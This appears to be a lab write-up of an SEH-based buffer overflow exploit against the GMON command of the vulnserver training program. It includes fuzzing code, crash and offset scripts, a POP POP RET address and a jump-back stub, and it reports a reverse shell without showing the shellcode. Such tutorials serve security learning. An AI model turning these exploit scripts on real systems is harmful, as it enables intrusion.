Vulnserver GMON exploit

SEH-based stack buffer overflow in the GMON command of vulnserver: fuzz to find the crash, locate the nSEH/SEH offsets, pick a POP POP RET gadget, then jump back into the controlled buffer.


Crashing the program!

from boofuzz import *
import time
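def get_banner(target, my_logger, session, *args, **kwargs):
    """boofuzz pre-send callback: read the vulnserver banner, treat its absence as a crash.

    Registered through ``session.connect(..., callback=get_banner)`` so it runs
    before every test case. If nothing can be read from the target, or the
    banner text is missing, the whole fuzzing run is stopped with exit status 1;
    the last case boofuzz sent is then the crashing one.

    Only ``target`` (``recv``) and ``my_logger`` (``log_check``/``log_pass``/
    ``log_fail``) are used; the remaining parameters exist to match the
    boofuzz callback signature.

    Raises:
        SystemExit(1): target unreachable or banner missing.
    """
    banner_template = b"Welcome to Vulnerable Server! Enter HELP for help."
    try:
        banner = target.recv(10000)
    except Exception:
        # Deliberately broad: this is the top-level "is the target alive" check.
        # NOTE(review): boofuzz wraps socket errors in its own exception classes,
        # so narrowing to OSError here would miss a dead target -- but unlike the
        # original bare `except:` this no longer swallows KeyboardInterrupt/SystemExit.
        print("Unable to connect. Target is down. Exiting.")
        raise SystemExit(1)
    my_logger.log_check('Receiving banner..')
    if banner_template in banner:
        my_logger.log_pass('banner received')
    else:
        # An empty or foreign reply means the previous case killed the server.
        my_logger.log_fail('No banner received')
        print("No banner received, exiting..")
        raise SystemExit(1)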
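def main(host="192.168.0.109", port=9999, sleep_time=0.5):
    """Fuzz the GMON command of vulnserver with boofuzz.

    Each test case is ``GMON <mutated string>\\r\\n`` over TCP. ``get_banner``
    runs before every case and stops the run as soon as the banner disappears,
    i.e. as soon as the previous case crashed the server.

    Args:
        host: target address (default is the original lab host).
        port: vulnserver TCP port.
        sleep_time: seconds boofuzz waits between cases, so the server has
            time to answer (or die) before the banner check.
    """
    session = Session(
        target=Target(
            connection=SocketConnection(host, port, proto="tcp"),
        ),
        sleep_time=sleep_time,
    )

    # Request layout: static command, fixed separator, fuzzed argument, CRLF.
    s_initialize(name="Request")
    with s_block("Host-Line"):  # label only (the name looks copied from the boofuzz HTTP example)
        s_static("GMON", name="command name")
        s_delim(" ", fuzzable=False)  # never mutate the separator, so every case reaches the GMON handler
        s_string("FUZZ")  # placeholder value; boofuzz substitutes its string mutations here
        s_delim("\r\n")

    session.connect(s_get("Request"), callback=get_banner)
    session.fuzz()


if __name__ == "__main__":
    main()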
No banner received: the previous test case crashed the server, so the get_banner callback stopped the fuzzing run.
import socket
import os
import sys
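host = "192.168.0.109"
port = 9999
crash_size = 5013  # number of 'A' bytes that crashed vulnserver in the fuzzing run


def build_crash_payload(size=crash_size):
    """Return the raw GMON request that reproduces the crash: ``GMON /.:/`` + ``size`` * ``A``.

    Built as bytes, not str: the request goes straight onto the socket, and a
    str would need an encoding step (and would break once non-ASCII bytes such
    as the POP POP RET address are added later).
    """
    return b"GMON /.:/" + b"A" * size


def send_crash(host=host, port=port, size=crash_size, timeout=10.0):
    """Connect to vulnserver, print the banner, send the crash payload and print the reply.

    The server is expected to die after the send, so a reset/closed connection
    or a timeout on the second recv is reported as "probably crashed" instead
    of propagating as a traceback. The socket is always closed (context manager).

    Args:
        host, port: target address.
        size: number of filler bytes after ``GMON /.:/``.
        timeout: socket timeout in seconds, so a hung server cannot block forever.
    """
    payload = build_crash_payload(size)
    with socket.create_connection((host, port), timeout=timeout) as s:
        print(s.recv(1024).decode("latin-1"))
        s.sendall(payload)  # sendall: send() may write only part of a 5 KiB payload
        try:
            print(s.recv(1024).decode("latin-1"))
        except (ConnectionError, socket.timeout) as exc:
            print("no reply after payload (%s) -- target probably crashed" % exc)


if __name__ == "__main__":
    send_crash()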
Registers are overwritten with 0x41 ('A') bytes from the payload.
The SEH chain is corrupted: both the next-record pointer (nSEH) and the handler address (SEH) now contain 0x41 ('A') bytes, so we control the exception handler.
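# Original crash payload size = 5013
# SEH handler offset = 3519 (from the crash), nSEH sits 4 bytes before it at 3515:
#   [3515 x 'A'] [nSEH @3515, 4 bytes] [SEH @3519, 4 bytes] [padding up to 5013]
# Distinct marker bytes make both fields easy to recognise in the debugger.
seh = b"BBBB"   # handler pointer  -> expected to show up as 0x42424242
nseh = b"CCCC"  # next-record ptr  -> expected to show up as 0x43434343
seh_offset = 3519
nseh_offset = seh_offset - 4
total_size = 5013

buffer = b"A" * nseh_offset
buffer += nseh
buffer += seh
buffer += b"D" * (total_size - len(buffer))  # keep the request at the original crash length
# A negative pad count would have been silently truncated to b"" above.
if len(buffer) != total_size:
    raise ValueError("payload is %d bytes, expected %d" % (len(buffer), total_size))
s.send(b"GMON /.:/" + buffer)  # `s` is the socket opened in the crash PoC above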
Successfully placed the markers: SEH now holds 0x42424242 ("BBBB") and nSEH holds 0x43434343 ("CCCC"), confirming the 3519 / 3515 offsets.

Checking for bad characters

No bad characters were detected other than 0x00, so the POP POP RET address and the jump stubs used below must simply avoid null bytes.

POP, POP, RET!

POP POP RET locations
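# Original crash payload size = 5013
# SEH handler offset = 3519; nSEH = 3519 - 4 = 3515
# SEH  -> address of a POP POP RET gadget, little-endian 0x6250172B. It
#         contains no 0x00, the only bad character found. Standard SEH
#         technique: when the handler is invoked, the pointer to our
#         registration record is two stack slots up, so POP POP RET
#         "returns" into the nSEH field and executes it as code.
# nSEH -> "\xEB\x06" = jmp short +6: relative to the end of the 2-byte jmp,
#         that skips the two NOPs left in nSEH plus the 4-byte SEH pointer
#         and lands right after the SEH record.
seh = b"\x2B\x17\x50\x62"
nseh = b"\xEB\x06\x90\x90"
seh_offset = 3519
nseh_offset = seh_offset - 4
total_size = 5013

buffer = b""
buffer += b"A" * nseh_offset
buffer += nseh
buffer += seh
buffer += b"D" * (total_size - len(buffer))
if len(buffer) != total_size:  # a negative pad count would silently shrink the payload
    raise ValueError("payload is %d bytes, expected %d" % (len(buffer), total_size))
s.send(b"GMON /.:/" + buffer)  # `s` is the socket opened in the crash PoC above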
Breakpoint set on the POP POP RET gadget (0x6250172B); it is hit when the exception handler is invoked, confirming the overwritten SEH pointer is used.
Short Jump

Jumping Back

push esp              ; copy ESP into EAX (54 58 -- no null bytes)
pop eax
add ax, 0x565         ; 66 05 65 05: add 0x565 to the LOW 16 BITS only; the carry out of AX
                      ; is dropped, so this only works while the target lies in the same
                      ; 64 KiB as ESP (the constant was presumably measured in the debugger)
jmp eax               ; FF E0: jump into the run of 'A's in the payload (see screenshot below)
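seh = b"\x2B\x17\x50\x62"  # POP POP RET gadget, little-endian 0x6250172B (contains no 0x00, the only bad char)
nseh = b"\xEB\x06\x90\x90"  # jmp short +6: over its own 2 NOPs and the 4-byte SEH pointer, onto `jumpback`
# push esp / pop eax / add ax, 0x565 / jmp eax: adjust the low 16 bits of a copy of
# ESP by 0x565 and jump there. The debugger shows this landing in the 'A' run below.
# Only AX is adjusted, so the carry out of bit 15 is lost -- it relies on the
# target lying in the same 64 KiB as ESP.
jumpback = b"\x54\x58\x66\x05\x65\x05\xff\xe0"
seh_offset = 3519
nseh_offset = seh_offset - 4
total_size = 5013

# Layout: [A * 3515][nSEH][SEH][jumpback][D padding] -- total stays at the crash size.
# NOTE(review): the reverse-shell shellcode is not shown on this page; it would
# replace part of the 'A' run that `jumpback` lands in.
buffer = b""
buffer += b"A" * nseh_offset
buffer += nseh
buffer += seh
buffer += jumpback
buffer += b"D" * (total_size - len(buffer))
if len(buffer) != total_size:  # a negative pad count would silently shrink the payload
    raise ValueError("payload is %d bytes, expected %d" % (len(buffer), total_size))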
EIP now points into the run of 'A's in the payload, i.e. the jump-back stub transferred execution into memory we control.
Got a reverse shell! (The shellcode that produced it is not shown in the snippets above; it goes in the 'A' region the jump-back stub lands in, and must avoid the 0x00 bad character.)

Reference
